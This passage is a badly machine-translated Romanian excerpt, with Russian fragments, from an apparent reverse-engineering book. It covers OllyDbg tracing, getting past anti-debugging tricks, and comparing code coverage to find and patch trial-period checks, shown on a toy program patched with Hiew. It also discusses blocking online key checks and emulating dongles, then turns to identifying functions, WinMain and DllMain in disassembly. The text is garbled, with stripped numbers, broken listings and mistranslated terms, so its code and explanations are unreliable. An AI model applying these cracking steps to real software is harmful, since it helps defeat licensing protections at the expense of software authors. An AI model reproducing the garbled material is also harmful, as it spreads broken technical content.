adevărată,fără a uita să luați steagul corespunzător Acum puteți începe urmărirea făcând clic pe + sau + Dacăexpresia este introdusă corect (ceea ce nu reușește întotdeauna la prima încercare), Ollydbg se va opri ascultătorînainte de a intra în constul apelului (Fig ) Este foarte incomod să faceți expresii complexe direct în linia deeditare, iar vizibilitatea suferă Vă confundați constant în paranteze și uitați ce este deja scris și ce nu În cele dinurmă, odată scrisă (și depanată!), Expresia trebuie să fie păstrată și furnizată cumva cu comentarii care explică ceeace face, de fapt, Din păcate, Ollydbg nu știe cum să alcătuiască expresii în editorul său preferat (de exemplu, îneditorul de manager Build -in Far, cauzat de apăsarea clipului cu Colorer , care permite să se deplasezeîntre paranteze și să controleze corectitudinea corectitudinii a atașamentului lor) Acolo puteți plasa și comentarii Cutoate acestea, expresiile voluminoase ale Ollydbg interpretează foarte lent, iar urmărirea devine complet prostie- Colorator- Aceasta este o bibliotecă care oferă o analiză sintactică Text cu eliberarea de construcții sintactice cu culoare, vă permite să analizați textul în editor în timp real Putețidescărca acest plugin aici: http://plugring farmager com/cgi-bin/downld cgi Partea a II -a Tehnicile de bază alehackerului hackerului șoferului și, pentru succesul operației, trebuie să realizăm analogul nostru pentru orice cuvântcheie, deoarece, după cum am menționat deja, optimizarea compilatorilor pot „dilua” comenzile Test EAX, EAH și JX Orez Instalarea punctelor de oprire pe secvența comenzilor de mașini, implementarea oricărui cuvânt cheie înlimbajul expresiilor este o sarcină foarte dificilă care poate fi făcută doar prin scrierea propriului tău dizassemblerde lungimi Cel mai bine este să -l realizăm sub forma unui plugin pentru un debugger, mai ales că textele inițiale aleDizassembler sunt distribuite împreună cu ollydbg (http://www ollydbg de/srcdescr htm), ceea ce înseamnă că principalulprincipal O parte din lucrare a fost deja făcută pentru noi Restul va termina Perl De ce nu?Poate că nu vă putețiimagina cel mai bun „motor” pentru a compila expresii regulate!Conectând Perl cu Dizassembler, vom primi un instrumentputernic Un flux de comenzi „extras” de pista Ollydbg este furnizat la intrarea pluginului, Dizassembler îl transformăîn text, dar Perl caută tot ceea ce îl indicăm în acest text O mică nuanță - Pentru a combate un cod auto -modificat,este necesar să se abandoneze vizionarea principală înainte și să analizeze doar instrucțiunile completate pe careOllydbg le pune în jurnal Cu toate acestea, acest obiectiv este deja prea ambițios Este destul de ușor să conectați Perlla Dizassembler și să vă bucurați de capacitatea de a stabili puncte pentru orice combinație de comenzi Acest lucru văva ajuta să ocoliți toate tehnicile anti -canalizare care sunt La urma urmei, orice tehnică anti -canalizare, de fapt,este stabilită de una sau o altă combinație de comenzi ale mașinii, iar numărul de variații posibile este destul delimitat După ce ați întâlnit protecția care duce debuggerul la prăbușire, ar trebui să găsiți ce combinație de comenziface acest lucru, apoi adăugați această recepție anti -decizivă la pluginul dvs În cele din urmă, analogul Icext pentruOllydbg, doar mai puternic Adevărat, el va funcționa încet datorită utilizării Perl stângace Capitolul Discuțiiextinse despre problemele de depanare Hacking prin acoperirea celui mai dificil lucru înhacking este să „balansezi” codul de protecție (reprezentând adesea o combinație banală de comenzi precum CallCheckReg/Test EAX, EAX/JX necontestat) După descoperirea acestui cod, hackingul devine o problemă detehnologie Arsenalul hackerului conține puncte de oprire, legături încrucișate și multe alte tehnici contrastante, darnu sunt întotdeauna eficiente În acest caz, hackerul trebuie să caute noi modalități și metode, dintre care una va filuată în considerare în această secțiune O idee de ghidare va lua în considerare un program imaginar cu o perioadă deutilizare limitată, care, de ceva timp, funcționând corect, apoi aruncă o casetă de dialog cu o cerință de a seînregistra și de a finaliza lucrarea Evident, dacă găsim codul care afișează această fereastră pe ecran, putem ajustadoar JX sau adăugăm mai multe instrucțiuni NOP Dar ce este necesar pentru a ajusta și cum să faceți acest lucru?Puteți,desigur, să puneți un punct final pentru funcția ari sau să treceți prin legături încrucișate către linii abuzive, dar acest lucru nu este suficient de eficient Există zeci de funcții ARI responsabile de citirea datei curente și acreării ferestrelor de dialog, iar liniile de text sunt adesea criptate sau stocate în resurse dar ce se întâmplădacă comparați rutele programului înainte și după expirarea perioadei de încercare?Codul care afișează fereastra de peecran nu este executat în primul caz, ci este executat în al doilea!Astfel, hacking -ul este redus la analiza acoperirii(acoperire), la măsurarea cărora profilatorii și utilitățile însoțitoare sunt angajate Acoperit se numește cod, celpuțin o dată a primit conducerea și, în consecință, dimpotrivă Acoperirea vă permite să hack alte tipuri de mecanisme deprotecție De exemplu, în acest fel este posibilă neutralizarea ecranelor cu cerința înregistrării (ecrane NAG), afișateprin intervale aleatorii sau regulate Pentru a face acest lucru, trebuie doar să rulați programul și să ieșiți imediatdin el, în fața ecranului NAG, iar în următoarea alergare, așteptați cu răbdare apariția sa După aceea, rămâne doar săcomparăm rezultatele acoperirii (deși acest lucru nu va salva dacă ecranul NAG este afișat înainte de lansareaprogramului) Protecția bazată pe un fișier cheie sau un număr de serie se rupe cu ușurință prin acoperire în prezența acel puțin o singură cheie Unii se pot întreba: De ce protecția la rupere dacă există deja o cheie?Foarte simplu!Multeprograme încearcă să confirme autenticitatea cheii prin internet, Și dacă cererea de confirmare primește din diferite adrese IR, atunci cheia este declarată „pirat”, iar programul estetrimis un semnal de decontaminare Acoperirea ne permite să determinăm instantaneu unde apare exact verificarea și să oblocăm În multe cazuri, problema este rezolvată de firewall, dar unele programe au învățat deja cum să determineprezența unei rețele, de exemplu, un apel către InternetgetConnectedTate În acest caz, dacă există o conexiune cuinternetul, mecanismele de protecție necesită cu tărie un firewall pentru a opri cheia pentru a activa cheia În modsimilar, lucrurile sunt cu chei electronice Comparând traseul programului cu cheia și fără cheia, vedem toateverificările, după care le neutralizăm sau scriem propriul nostru emulator, de asemenea depanați prin comparareapieselor Acoperirea oferă mâinilor noastre o modalitate fiabilă de a hack, permițându -vă să identificați toateverificările, chiar dacă merg de la diferite adrese și cu probabilitate diferită Obținem o „distribuție în relief” dintr-un program care detectează cu ușurință ceea ce se găsește fără acesta doar prin urme obositoare sau dizassmitdureros Multe utilități sunt angajate în alegerea instrumentelor pentru analiza acoperirii, atât comerciale, cât șigratuite Favoritele explicite includ instrumentul de acoperire Iniei, Numega Truecoverage, etc până la profilul MSProfile exe, care este inclus în Visual Studio Cu toate acestea, toate sunt concentrate pe colaborarea cu programe careau textele originale, dar fișierul binar „gol” nu este procesat cu partea II Tehnici de bază pentru hackerarea înpicioare Din fericire, este destul de ușor să le înșele, generând toate informațiile necesare pe baza listelorDizAssembler obținute folosind IDA Pro De fapt, persoana profilată are nevoie doar de informații despre linii șifuncții Nu funcționează cu textul inițial și pentru a rezolva problema, este suficient pentru noi să adăugăm informațiide depanare în fișierul hacked Adevărat, pentru asta va trebui mai întâi să te ocupi de formatul său Unii profiluripercep fișierele de hartă banală (care pot fi generate automat de același pro -dizassembler IDA), dar majoritateafuncționează cu propriile formate (de obicei sub -sub -ci), strâns legate de compilațiile corespunzătoare (de exemplu,în cazul instrumentului de acoperire Intel Compilator ForTran sau Intel C ++ Compiler) În plus, Instrumentul deacoperire Intel necesită prezența obligatorie a Intel Vtune Performance Analyzer (Fig ), a cărei dimensiunedepășește MB În plus, Intel VTune Performance Analyzer nu funcționează bine sub VMware Editare de fișiere RunVizualizare insert Configurare pentru fereastră Ajutor Diglei > UI -|Iff |Al AJ |I p \ n"); dif (pl, p , fl);pnntf ("\ndiff p -> pl \ n"); dif (p , pl, f );Retum ;} Compilarea acestui program se realizează cu tastele implicite Înspecial, atunci când utilizați Microsoft Visual C ++, linia de comandă arată astfel: SI Exe log-coverage-dif F C, șipentru a crea o opțiune optimizată-cl exe /OH-coverage-dif F S Codul sursă și fișierele executabile ale acestuiprogram pot fi găsite pe CD furnizate cu această carte în catalog \ ch \ src Partea a II -a Tehnicile debază de hacking, rețineți dacă copiați întregul text al programului în lista pe mediul de dezvoltare și încercațisă compilați și să combinați programul pentru a apăsa tasta (burld), atunci încercarea de compilare se va încheiaîn eșec Nu vă mirați în acest sens, deoarece programul nu ar trebui să compileze în acest fel În mod implicit,Microsoft Visual Studio creează un proiect pentru C ++, iar acest program este scris pe clasicul C, prin urmare, trebuiesă -l compilăm din linia de comandă un exemplu de hacking ca exercițiu ca exercițiu, scrieți cea mai simplă protecțieÎntr -o perioadă de încercare și încercați să -l hack, comparând acoperirile înainte de expirarea procesului șidupă Codul inițial al programului hacked poate arăta, de exemplu, așa cum se arată în lista Perioada de încercareeste stabilită de constantele UE (an), acele (luna), MD (zi) Instalați aceste constante în conformitate cu data curentă(astfel încât programul să funcționeze în continuare înainte de începerea experimentelor) = Listarea Program Coeg^^ C ^^ Căută de o tăietură^alnyia^ohm ini expirat = ;#define md #define me #define ye foo () systemtimesy;GetSystemTime (& sy);If ((sy wyear & oxf)*sy wmonth*sy wday> (ye & oxf)*me*md) a expirat = l;Main () printf ("Trialde acoperire \ n");Foo ();if (expirat) printf ("Trial a expirat! \ n");Compilarea se realizează în același mod ca încazul precedent (vezi Lista ) Ca urmare a compilării și aspectului, fișierul Coverge exe va apărea pe disc Lansațiacest fișier pentru execuție pentru a vă asigura că programul oferă liniei de încercare OK Apoi traduceți datasistemului pentru sfârșitul perioadei de încercare și începeți din nou programul Acum, programul va afișa Tritul aexpirat!, Iar acest lucru înseamnă că programul trebuie să fie rupt!Returnați data sistemului la starea inițială șiacoperirea încărcăturii exe la Ollydbg (Fig ) Apoi, din meniul Vizualizare, selectați comanda RUN TRACE și apăsațicombinația de tastatură + pentru a apela meniul contextual Din meniul contextual, selectați comanda jurnal lafișier și în caseta de dialog care apare, introduceți numele fișierului - covergel txt Apoi apăsați + (urmărește) și așteptați programul să finalizeze lucrarea Pe discul apelului Discuții extinse despre depanarea a de articole CoverAgel txt este de aproximativ MB În aceeași fereastră de urmărire, faceți clic pe Combinația detastatură + încă o dată și închideți fișierul de protocol (închideți fișierul jurnal) Restaurațiprogramul apăsând combinația + , traduceți data sistemului înainte, apoi reveniți la fereastra deurmărire Apăsați combinația de tastatură + , selectați comanda jurnal pentru a fișier și introduceți numelefișierului acoperire txt Rulați urmele de apăsare + , așteptați finalizarea programului și închideți fișierulde jurnal ( + , închideți fișierul jurnal) Acum avem două fișiere de jurnal care pot fi procesate prin log-coverage-diff exe pentru a vedea diferențele de acoperire până la termenul de testare și după (lista ) Листинг ° п покрытиякьда прол м до ianuată Adăugare principală ESP, Diff P -> PL B Main Min DWORD PTR DS:[ F ], Acoperire Push Partea II Базовые техники хакерства С Маіп Маіп МаіпCALL coverage ADD ESP, JMP SHORT coverage Проанализировав полученные результаты, показанные влистинге , даже начинающий сможет догадаться, что двойное слово по адресу F h представляет собой глобальныйфлаг истечения испытательного срока, Și echipa Mook Dword PTR DS: [ f ], i - doar același cod care îl ia atunci cândse încheie perioada de încercare Pentru a obține programul în uz nelimitat, suficient Înlocuiți Mow DWORD PTR DS: [ f ], Namo DWORD PTR DS: [ F ], Descărcați Covearage exe Hiew, apăsați tasta de două ori pentru a merge la modul Dizassembing, apăsați (Goto) și introduceți adresa comenzii MOOC, dupăce a transmis -o cu un simbol al punctului (punctul este necesar pentru a indica Hiew că aceasta este adresa și nudeplasarea de la începutul fișierului) În cazul analizat, această adresă este egală cu V Acum faceți clic pe pentru a activa modul de editare, apoi - pentru introducerea echipei de asamblare (Fig ) Hiew copiazăautomat instrucțiunea curentă din linia de editare și trebuie doar să înlocuim cu și să facem clic pe pentru asalva modificările din fișier După ieșirea din Hiew, fișierul poate fi lansat, indiferent de datacurentă Orez Hacking of the Coverge exe Utilizând Hiew ca opțiune, puteți deschide acoperire exe în IDA Pro șivedeți ce se află la adresele emise de utilitatea Log-Coverage-Fiff exe (listarea ; diferențe în codul care acoperăcodul și după termenul de testare selectat în fontul jumătate), precum și în împrejurimile lor Poate că vom găsi omodalitate mai rapidă de a hack Sub Proc în apropiere de Push EBP MOV EBP, ESP SubESP, LOH LEA EAX, [EBP+SISTENFTIME] PUSH EAX;Ipsystenftime a CALL DS: getSystenFtime MOVECX, DWORD PTR [EBP+SystenFtime wYear] and ecx, OFFFFh and ecx, OFh С mov edx, dwordptr [ebp+SystenfTime wMonth] Глава Расширенное обсуждение вопросов отладки F and edx, OFFFFh imul ecx, edx mov eax, dword ptr [ ebp+SystemTime wDay] Вand eax, OFFFFh imul ecx, eax emp ecx, Oh jle short loc В nov dword F , ос : mov eșp, ebp pop ebp retn sub endp main proc În apropiere de Push EBP A MOV EBP, ESP C PUSH OFFSET Acovegetrial;"Trial de acoperire \ n" Apelați printf Adăugațieșp, Apelați sub E EMP DWORD F , JZ Short LOC PushOffSeiriaria;"trial has expired!\n' С call prințf add esp, jnp short ІОС- ос : push offset aTrialOk ;"trial ok\n" В call printf add esp, ос : POP EBP Retn Fig Diferența de acoperire a codului programuluistudiat la vizualizare în IDA RGO Partea a II -a Tehnicile de bază ale hackingului, după cum puteți vedea, „inima”mecanismului de protecție este concentrat În procedura Sub oooo, care compară data curentă cu constanta furată dur(dur) constanta, după care poartă JLE la OS YU (perioada de încercare nu a expirat încă) sau nu face aceastătranziție, apoi MOV DWORD F , MOV DWORD F , stabilește steagul global al perioadei de testare, verificatdoar într -un singurSte - la yu e Această adresă este urmată de o tranziție condiționată JZ scurt iOS YU B,alegând care dintre cele două mesaje de afișat pe ecran Notă În programele cu adevărat protejate, steagul deînregistrare este de obicei verificat în mod repetat dacă înlocuim JLE Scurt OS cu JMP Short S , steagulde testare nu va fi niciodată cocoșat Pentru claritate, puteți scrie un script simplu pe Ida C, citind rezultatulutilității log-coverage-diff exe și notând diferențele de acoperiri cu orice simbol, de exemplu, * * va însemna căaceastă echipă de mașină a fost efectuată Doar în prima rulare și * * - numai în a doua (Fig ) Reținețidetaliile sintaxei IDA C și tehnica de scriere a scripturilor pot fi găsite în cartea „IDA Pro” Imagine ” Vom rezumaconcluzia - în acest capitol, completând a doua parte a cărții, am întâlnit noi metode de hacking, am scris mai multeutilități utile și îmbogățite cu idei proaspete În general, ne -am distrat bine și acum putem merge cu încredere,trecând la stăpânirea metodelor mai complexe de cercetare a codurilor Chris Kaspersky „Modul de a gândi este IDA ProDizassembler” -Solon-R, Partea a III-a Identificarea structurilor cheie ale limbilor la nivel înalt Capitolul ​​Identificarea funcțiilor Studiul algoritmilor de lucru scrise în limbi cu nivel înalt, în mod tradiționalîncepe cu reconstrucția structurilor cheie ale limbajului original - funcții, variabile locale și globale, ramuri,cicluri etc și simplifică foarte mult analiza sa Dizassamble moderne sunt destul de intelectuale, iar ponderea leuluide lucrări privind recunoașterea structurilor cheie este preluată În special, IDA Pro face față cu succes identificăriifuncțiilor de bibliotecă standard, variabile locale abordate prin registrul ESP, caz, etc Cu toate acestea, uneorichiar și IDA Pro greșește, înșelător pe cercetător, în plus, costul ridicat al acestui Dizassembler este nu întotdeaunajustifică aplicația sa Așadar, de exemplu, pentru studenții care studiază asamblatorul (și cel mai bun instrument pentrustudierea asamblatorului este Dizassemble -ul programelor altor oameni), acesta va fi cu greu un buzunar Desigur, luminanu a convergut pe IDA Pro - există și alte dizassemble, spun aceeași utilitate de dumpbin, care face parte dinstandardul SDK Desigur, dacă nu există nimic mai bun la îndemână, Dumpbin va coborî, dar în acest caz, intelectualitateaDizassemblerului va trebui să fie uitată și să îndeplinească manual toată munca În primul rând, vom face cunoștință cucompilatorii non -optimizanți - analiza codului lor este relativ simplă și destul de accesibilă pentru înțelegerea chiarși începătorii în programare Apoi, după ce am stăpânit Dizassembler, să trecem la lucruri mai complexe - optimizareacompilatoarelor care generează un cod foarte viclean, confuz și ornat Metode de recunoaștere a funcțiilor funcționale(numită și procedură sau subprogramă)-Principala unitate structurală a limbilor orientate spre procedură și obiective,prin urmare, dezasamblarea codului începe de obicei cu identificarea funcțiilor și identifică argumentele transmise deacesta Strict vorbind, termenul „funcție” nu este prezent în toate limbile, ci chiar și acolo unde este prezent,definiția sa variază de la limbă la limbă Fără a intra în detalii, ne referim la funcția unei secvențe separate decomenzi cauzate de diferite părți ale programului Funcția poate lua unul și mai multe, argumente e sau nu acceptă unulsingur;Poate returna rezultatul operei sale sau nu se poate întoarce - acest lucru nu mai este important Proprietateacheie a funcției este revenirea controlului la locul apelului său, iar semnul său caracteristic este o provocaremultiplă din diferite părți ale programului (deși unele funcții sunt cauzate doar dintr -un punct) Cum știe funcția undesă returneze gestionarea?Evident, codul de apel trebuie să salveze mai întâi adresa de retur, apoi, împreună cu alteargumente, să o transfere la funcția apelată Există multe modalități de a rezolva această problemă Puteți, de exemplu,înainte de a apela funcția pentru a plasa o tranziție necondiționată la adresa de retur la sfârșitul acesteia Ca opțiunealternativă, puteți salva adresa de retur într -o variabilă specială, iar după Partea a III-a Identificarea structurilor cheie ale limbilor de nivel înalt completarea funcției pentru a efectua o tranzițieindirectă folosind această variabilă ca operand al instrucțiunilor de salt Fără a reda la discuția punctelor tari și apunctelor slabe ale fiecărei metode, observăm că compilatorii din marea majoritate a cazurilor folosesc comenzi specialepentru mașini și, respectiv, ret, proiectate, pentru a apela funcția și a ieși din ea Instrucțiunea de apel aruncăadresa următoarelor instrucțiuni în partea de sus a stivei, iar RET scoate această adresă de acolo și transmitecontrolul acesteia Adresa indicată de instrucțiunea de apel este adresa de la începutul funcției Iar instrucțiunea deinstrucțiune închide funcția Rețineți că nu orice instrucțiune RET indică sfârșitul funcției Mai multe detalii despreaceasta vor fi descrise în capitolul , „Identificarea valorii returnate de funcție”) Astfel, puteți recunoaște funcțiaîn două moduri: prin încrucișare Referințe (referințe încrucișate) care duc la instrucțiunile mașinii de apel și prinepilogul său (epilog), instrucțiunea finală ret Legăturile încrucișate și epilogul în agregat vă permit să determinațiadresele începutului și sfârșitului funcției Alergând puțin înainte, observăm că la începutul multor funcții există osecvență caracteristică de comenzi, numită Reader (Prlogue), care este potrivită și pentru identificareafuncțiilor Acum să ne uităm la toate aceste probleme mai detaliat Legături încrucișate Vizualizând codul DizAssembler,găsim toate instrucțiunile de apel - conținutul operandului lor și va fi adresa dorită a începutului funcției Adresafuncțiilor non -loanale cauzate de nume este calculată chiar și în stadiul de compilare, iar operandul instrucțiunilorde apel în astfel de cazuri este o valoare directă Datorită acestui fapt, adresa începutului funcției este dezvăluită deo simplă analiză sintactică: căutăm o căutare contextuală a tuturor Apelați melodii și amintiți -vă (scrieți) operandele lor directe Luați în considerare următorul exemplu (listarea ) : Listarea , l Exemplu Damon Strong -Rock " Apelarea intensă a funcțiilor func ();Main () {inta;Func ();a = x ;Func ();} Func () {int a;Rezultatul compilării sale ar trebui să privească aproximativ așa cum searată în lista Epilogul funcției - mai multe linii de cod care sunt la sfârșitul funcției și restabilesc stiva șise înregistrează la statul pe care îl aveau înainte de a apela funcția A se vedea secțiunea „Epilogul” în continuare înacest capitol al prologului funcției - mai multe linii de cod, care sunt la începutul funcției și pregătesc stivă șiregistre pentru a lucra cu funcția A se vedea secțiunea „Prolog” în continuare în acest capitol, precum și capitolul ,„Identificarea variabilelor locale de sticlă” Capitolul Identificarea funcțiilor text: text: text: text: text: Text: text: text: text: text: text: text: text: text: : Text: text: text: text: text; text: text: text: text: text: a text: c : Text: Text - Text: Pushh EBP MOV EBP, ESP PUSH ECXCall ;A găsit o instrucțiune de apel cu un operand direct;reprezentând adresa începutului funcției ;Mai precis,deplasarea sa în segmentul de cod;(În acest caz, în segmentul „ Text”) ;Acum puteți merge la linie "Text: ";Și,având în vedere funcțiile propriului nume, înlocuiți operandul,- Instrucțiuni de apel pentru proiectarea „Nume decompensare a apelului” Mov DWORD PTR [EBP- ], H Call ;Și iată un alt apel de funcție!Întorcându -se la linie;" Text: ", vom vedea că acest set de instrucțiuni;Deja definit ca funcție Tot ceea ce este necesar;faceți, înlocuițiapelul prin;„Call Offset Function” Mov Esp, EBP POP EBP Retn;Așa că am întâlnit instrucțiunile pentru întoarcereade la funcție;Cu toate acestea, nu este faptul că acesta este cu adevărat sfârșitul funcției -;La urma urmei, o funcțiepoate avea mai multe puncte de ieșire ;Cu toate acestea, vezi: urmat de RET este începutul unei funcții;„Funcția mea”,identificată conform operandului;Instrucțiuni apelează Deoarece funcțiile nu pot;Suprapunerea, se dovedește că acest RETeste o funcție a funcțiilor push ebp;Operandurile mai multor instrucțiuni se referă la această linie Prin urmare,aceasta este adresa începutului funcției ;Fiecare funcție ar trebui să aibă propriul său nume - ca și pentru noi;osuni?Să o numim „funcția mea” Mov ebp, esp; \ part \ ch \ src \ crackme PARTEA III Identificarea structurilor cheie ale limbilor denivel înalt Intintint argc, char ** argv) printf ("%x \ n", max ( x , x ));Printf ("%x \ n", max ( x ,argc));Printf ("%x \ n", max ( x , argc));Întoarce ;Rezultatul compilării sale în cazul general ar trebui săprivească așa cum se arată în lista , Rezultatul compilării exemplului dat în lista Push ESI Push edi Push H; mooos -jx", dar a devenit;"CMP -> JX, Moos Și în aldoilea rând, tranziția condiționată JL este misterioasă;S -a transformat în JGE , cu toate acestea, nu există nimicmisterios aici - pur și simplu merge;Prin optimizare!De la cel de -al treilea apel al funcției Max;Variabila argcplasată de compilatorul în registrul ESI nu mai este;Folosit, compilatorul apare direct;Modificați acest registru și nuintroduceți o variabilă temporară ,;După ce a evidențiat registrul EDI sub acesta OS :;Cod xref:sub + bîj Capitolul ​​Identificarea funcțiilor Push ESIPush Offset APRC;"%x \ n" Call Printf Add ESP, MOV EAX, EDI POP EDI POP ESI RETN, A se vedea, în timpul primului apel,compilatorul a aruncat chiar întregul cod funcțional, calculând rezultatul funcționării sale chiar și în faza decompilare ( Într -adevăr, x este întotdeauna mai mult de x și nu este necesar să cheltuiți tacturi de procesorîn comparația lor) Și al doilea apel este foarte puțin similar cu cel de -al treilea, în ciuda faptului că, în ambelecazuri, funcțiile au fost transmise aceleași argumente!Aici trebuie să înțelegeți mult timp, aceeași funcție se numeștesau nu!O observație despre procedura pentru funcțiile de difuzare Majoritatea compilatoarelor au funcții în fișierulexecutabil în același mod în care au fost declarați în program Modele de memorie și compilatoare de ori sub „adresa”funcției din acest capitol până în prezent implică exclusiv deplasarea sa în segmentul de cod Un model de memorie plat(plat) al „pachetelor” ferestre pe de biți toate cele trei segmente-segmentul de cod, segmentul stivei și segmentulde date-în Intto într-un singur spațiu vizat cu patru hogabay, permițându-vă să uitați de existența segmentelor Un altlucru este aplicațiile pe biți pentru MS-DOS și Windows X În ele, dimensiunea maximă admisă a segmentelor este dedoar kb, ceea ce nu este în mod clar suficient pentru majoritatea aplicațiilor În modelul de memorie minuscul(minuscul), segmentele codului, stivei și datelor sunt, de asemenea, localizate într -un spațiu vizat, dar, spredeosebire de modelul plat, acest spațiu vizat are dimensiuni extrem de limitate și, prin urmare, mai mult sau mai puțingrav Aplicația trebuie distribuită de mai multe segmente În această situație, pentru a apela funcția, nu mai este suficientsă cunoașteți deplasarea acesteia - trebuie să indicați și segmentul în care se află Din fericire, astăzi este necesarsă uităm de acest rudiment cu o conștiință calmă Pe fundalul versiunilor de de biți ale ferestrelor, cucerireaconstantă a pozițiilor, pur și simplu nu are sens să descrie în detaliu codul pe biți Capitolul Identificareafuncțiilor de pornire Dacă primul programator de aplicație care se întreabă: „Cu ce ​​funcție începe implementareaprogramului Windows?”, Atunci, cel mai probabil, vom auzi ca răspuns: „Cu Winmain”, iar acest lucru va fi Fii ogreșeală De fapt, codul de pornire (codul de pornire), ascuns de compilator, este primul care a controlat controlul afinalizat procedurile de inițializare necesare, la un moment dat apelează la funcția Winmain, iar după finalizarea saprimește din nou control și efectuează un „ Capital ”Deinocializare În marea majoritate a cazurilor, codul de pornire nueste de niciun interes, iar prima sarcină a programului Brander Analiza este căutarea funcției Winmain Dacă compilatoruleste printre „cunoștințe” IDA Pro, atunci funcția Winmain va fi recunoscută automat În caz contrar, acest lucru trebuiefăcut manual De obicei, furnizarea standard a compilatorului include textele originale ale bibliotecilor sale, inclusivprocedurile de cod de pornire De exemplu, în Microsoft Visual C ++, codul de pornire este localizat în următoarelefișiere: □ CRT \ STC \ CRTO C - o versiune pentru un aspect static;□ CRT \ src \ crtexe c - o versiune pentru un aspectdinamic în care codul bibliotecii nu este atașat la fișier, ci este numit din DLL;□ CRT \ src \ wincmdln c - Versiunepentru aplicații de consolă La Borland C ++, toate fișierele cu un cod de pornire sunt stocate într-un catalog separatcu același nume În special, codul de pornire pentru aplicațiile Windows este conținut în fișierul Cow asm După ce teocupi de textele de pornire, îți va fi mult mai ușor să înțelegi frunzele Dizassembler!Dar ce se întâmplă dacă uncompilator necunoscut sau inaccesibil a fost utilizat pentru compilarea programului studiat?Înainte de a continua cu oanaliză manuală obositoare, să reamintim ce prototip are funcția Winmain (lista ) • Listarea Прототип функцииWinMain int WINAPI WinMain( HINSTANCE hlnstance, // Handle to current instance // Дескриптор текущего экземпляра //Handle to previous instance HINSTANCE hPrevInstance, LPSTR IpCmdLine, int nCmdShow // Дескриптор следующего экземпляра// Pointer to command line // Указатель на Linia de comandă // Afișați starea ferestrei // starea ferestrei GPAVA Identificarea funcțiilor de pornire, argumentul argument-Hinstance-se calculează cel mai adesea „On Fly” prin apelulgradului GetModuleHandlea Astfel, găsind Un design precum apelul GetModuleHandlea, putem spune cu un grad ridicat deîncredere că următoarea funcție este wînmain În cele din urmă, provocarea Wönmain este de obicei localizată aproape lasfârșitul codului funcției de pornire În spatele acestei provocări nu este mai mult de dVUH-trei „închidere” sistem defuncții, cum ar fi ieșirea și XCPTFILTER Luați în considerare un fragment din codul dat în lista Imediat o mulțimede instrucțiuni de apăsare sunt izbitoare, aducând argumentele în sticlă, dintre care ultimul transmite rezultatulfinalizării funcției GetModuleHandlea Aceasta înseamnă că înaintea noastră este provocarea wînmain (iar IDA Pro confirmăfaptul că acesta este exact cazul) Text: PUSH EAX Text: PUSH ESI Text: PUSH EBX Text: PUSH EBX Text: Apel DS: GetModuleHandlea Text: E PUSH EAX Text: F apel Text: PUSHH EAX Text: Apel DS: Ieșire, dar nu întotdeauna totul este atât de simplu dezvoltatori, folosind prezențatextelor inițiale ale codului de pornire, modificați-l (uneori foarte semnificativ) Drept urmare, este posibil caexecuția programului să nu înceapă cu wînmain, dar cu orice altă funcție, în plus, acum codul de pornire poate conțineoperațiuni critice pentru înțelegerea funcționării programului de operare (de exemplu, decodificatorul principal de cod)!Prin urmare, este întotdeauna recomandat să studiezi cel puțin pe scurt codul de pornire, acesta conține cevaneobișnuit?Identificarea funcției diimain în același mod este cu bibliotecile dinamice - implementarea lor nu începedeloc cu funcția diimain (dacă, desigur, este în general prezentă în DLL), ci cu dllmaincrtStartup (implicit) Cu toateacestea, dezvoltatorii schimbă uneori setările implicite, alocând compuși /intrare în funcția de pornire, de care au nevoie Strict vorbind, este incorect să numim diimain funcția de pornire - se numește nu numai atunci cândîncărcați DLL, ci și la descărcare, precum și atunci când creați/distrugeți noul flux care l -a conectat Primindnotificări despre aceste evenimente, dezvoltatorul poate lua unele acțiuni (de exemplu, pregătește codul pentru muncăîntr -un mediu cu mai multe fluxuri) Întrebarea este foarte relevantă - are toată această semnificație pentru analizaprogramului?Într -adevăr, cel mai adesea este necesar să analizăm în întregime întreaga bibliotecă dinamică, ci săexplorăm activitatea unor funcții exportate de aceasta Dacă Diimain efectuează unele acțiuni, să zicem, inițializeazăvariabile, atunci restul funcțiilor care se aplică influenței acestor variabile vor conține legături directe care duc laDiimain Astfel, nu ar trebui să cauți manual Diimain - se va găsi!Cu toate acestea, ar exista despre identificareaargumentelor va fi descrisă în detaliu în capitolul , „Identificarea argumentelor funcțiilor” PARTEAIII Identificarea structurilor cheie ale limbilor de nivel ridicat este bună dacă ar fi fost întotdeauna cazul!Dar viațaeste mai complicată decât orice reguli Dintr -o dată, în Dllmain, există un anumit cod distructiv sau bibliotecă care,pe lângă activitatea sa principală, care spionează în spatele fluxurilor, urmărindu -și aspectul?Atunci nu puteți facefără analiza directă a codului său!Detaliile dllmain este mult mai dificilă decât wmmain și, dacă nu o consideră IDAPro, situația este serios complicată În primul rând, prototipul funcției dllmain este destul de necomplicat și nuconține nimic caracteristic (lista ) Listarea Dallmain Bool Winapi Dallmain (Hinstance HinstdLL, DwordFDWREASON, LPVOID IPVRESERVED // Handle to DLL MODULE // DLL module descriptor From the gum itself, the most impressivefunction is dllMaincrtstartup, and quickly make sure that this is the Call instruction that we need , nu există niciooportunitate Cu toate acestea, există încă unele clippers Deci, dacă Dllmain nu are succes, iarcodul dllmaincrtstartup este sigur că va verifica RIT este o valoare, în cazul în care, prin efectuarea tranziției lasfârșitul funcției Nu există atât de multe ramuri detaliate în corpul funcției de pornire și, de obicei, doar unadintre ele este asociată cu o funcție care ia trei argumente Un exemplu care ilustrează identificarea funcției dllmainprintr -un cod de inițializare nereușită, dat în lista Listarea Identificarea codului Dhmaînno alinițializării nereușite Text: c Push Text: d Push text: e Push Text: f Call Text: CMP Text: MOV Text: a JNZ Text: C Test text: e JNZ EDI ESI EBX DLLMAIN@ ESI, [EBP+ARG ], EAX LOC scurt EAX Short LOC derulând ecranul puțin în sus, este ușor să vă asigurați căregistrele EDI, ESI și EBX conțin, respectiv, ipvreserved, fdwreon și, respectiv, hinstdll Și asta înseamnă că înainteanoastră nu este altceva decât funcția dllmain Notă Codul sursă al funcției dllmaincrtStartup este conținut în fișieruldllcrto c, care merită studiat Identificarea funcției principale a aplicațiilor Windows console, în sfârșit, am ajuns lafuncția aplicațiilor Windows Console Ca întotdeauna, execuția programului nu începe cu acesta, ci cu funcțiaMainCrtStartup, care inițializează grămada (grămada), sistemul de intrare-ieșire, pregătește argumentele liniei decomandă și numai atunci GPAVA Identificarea funcțiilor de pornire trădează funcția principală Funcția principalăacceptă doar două argumente: int Main (int argc, char ** argv) Acest lucru este prea puțin pentru a -l evidenția printrerestul Cu toate acestea, faptul că tastele liniei de comandă sunt disponibile nu numai prin argumente, ci și prinvariabilele globale argc și, respectiv, argv, vin la salvare Prin urmare, apelul de apel arată de obicei, așacum se 